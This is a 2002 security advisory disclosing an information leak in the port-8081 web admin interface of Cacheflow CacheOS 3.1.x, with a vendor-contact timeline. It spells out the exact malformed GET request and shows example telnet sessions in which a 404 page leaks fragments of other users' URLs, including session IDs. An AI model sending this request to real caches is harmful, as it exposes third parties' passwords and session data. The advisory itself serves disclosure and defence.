svindel.net security advisory - web admin vulnerability in CacheOS

["Bjorn Djupvik" <bugtraq () svindel net>]

----------------------------------------------------------------------------
-------------------

SECURITY ADVISORY

No:  001 (yay, our first!)
Credits: svindel.net research team
Date published: 01/08/2002
First discovered: 10/31/2001
Title: Cacheflow CacheOS[tm] web admin vulnerability
----------------------------------------------------------------------------
-------------------
Description:
CacheOS is a piece of software used by web caching devices made by Cacheflow
(www.cacheflow.com), basically an Intel based box with a RAID array and a
custom OS.
The CacheFlow has a web-admin interface open at port 8081 by default.
By sending a certain request, malicious hosts can view parts of web pages
and url's transferred through the cache at the time. Examples of
data that may be gathered using this method are, usernames/passwords, form
contents, url's etc..

This exploit was tested on various CacheOS v3.1.*  boxes and all were
vulnerable, we did not test on 4.* versions.

Exploit:

telnet or use nc to connect to port 8081, then issue the following command:

GET /Secure/Local/console/cmhome.htm

Now legally in http you should also supply something like HTTP/1.0 at the
end of that string, if
you do that then the cache replies that my station is not authorized to view
page. If you omit HTTP/1.0 like I did above, most times the cache just
issues this:

----------------------------------------------------------------------------
-------------------
Example exploit session:

localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 200 OK

Request cannot be honored
Connection closed by foreign host
----------------------------------------------------------------------------
-------------------


But if you try multiple times it will sometimes return something like this:


----------------------------------------------------------------------------
-------------------


localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 404-Not Found

<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The
request
ed URL "/Secure/Local/console/cmhome.htm

Easp&o=0&sv=za5cb0d78&qid=E2BCA8F417ECE94DBDD27B75F951FFDA&uid=2c234acbec234
acbe
&sid=3c234acbec234acbe&ord=1" was not found on this
server.<P></BODY>Connection
closed by foreign host.
----------------------------------------------------------------------------
-------------------


As you can see, the chunk of code it blurted out in the 404 page contained
part of an url that a client on
the cache was visiting at the time.
We have also been able to read passwords from URL's using this technique.
There are probably more ways to exploit this and greater holes to be found,
but we didn't find any.. feel free to poke around :)

Vendor status:  support () cacheflow com were contacted on 10/31/2001 and we
got a quick reply asking us for more information, however no information of
patches or fixes were supplied to us so we don't know if this is fixed in
the latest versions of CacheOS or not. Since such a long time has passed, we
are now releasing this advisory.

----------------------------------------------------------------------------
-------------------

[c] 2002 svindelegget